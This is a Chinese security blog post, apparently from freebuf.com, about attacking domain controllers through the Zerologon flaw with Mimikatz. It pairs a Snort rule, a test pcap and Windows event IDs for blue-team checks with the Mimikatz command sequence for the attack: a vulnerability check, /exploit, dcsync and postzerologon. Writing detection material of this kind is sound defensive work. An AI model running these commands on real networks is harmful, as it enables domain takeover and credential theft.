Mimikatz利用Zerologon攻击域控服务器相关命令（附蓝队自查方案） – 作者:宽字节安全实验室

0x01 前言

mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截图如下

mimikatz相关命令

1. lsadump::zerologon /target:dc.hacke.testlab /account:dc$  poc
2. lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit  通过zerologon`漏洞攻击域控服务器
3. lsadump::dcsync
4. lsadump::postzerologon /target:conttosson.locl /account:dc$ #   恢复密码

snort 检测规则

alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)

pcap包

利用zerologon漏洞攻击域控的数据包，方便同学们写完规则做测试
https://github.com/sbousseaden/PCAP-ATTACK/blob/master/Lateral%20Movement/CVE-2020-1472_Zerologon_RPC_NetLogon_NullChallenge_SecChan_6_from_nonDC_to_DC.pcapng

windows事件管理器自查

在未打补丁的域控，重点查看windows事件管理器中，eventid为4742或者4624

在windows 8月更新中，新增事件ID 5829，5827，5828，5830，5831。蓝队可以重点关注这几个事件ID以方便自查

1. 当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时，将生成事件ID 5829。
2. 管理员可以监控事件ID 5827和5828，这些事件ID在存在漏洞的Netlogon连接被拒绝时触发
3. 5830，5831  如果“域控制器：允许易受攻击的Netlogon安全通道连接”组策略允许连接。

mimikatz通过zerologon攻击成功后，将会留下事件id为4648。

参考

1. How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472
2. Detecting the Zerologon vulnerability in LogPoint
3. https://gist.githubusercontent.com/silence-is-best/435ddb388f872b1a2e332b6239e9150b/raw/8064d33f62d5983130d3d946aac28ea00aaf6c4a/gistfile1.txt

来源：freebuf.com 2020-09-22 11:27:46 by: 宽字节安全实验室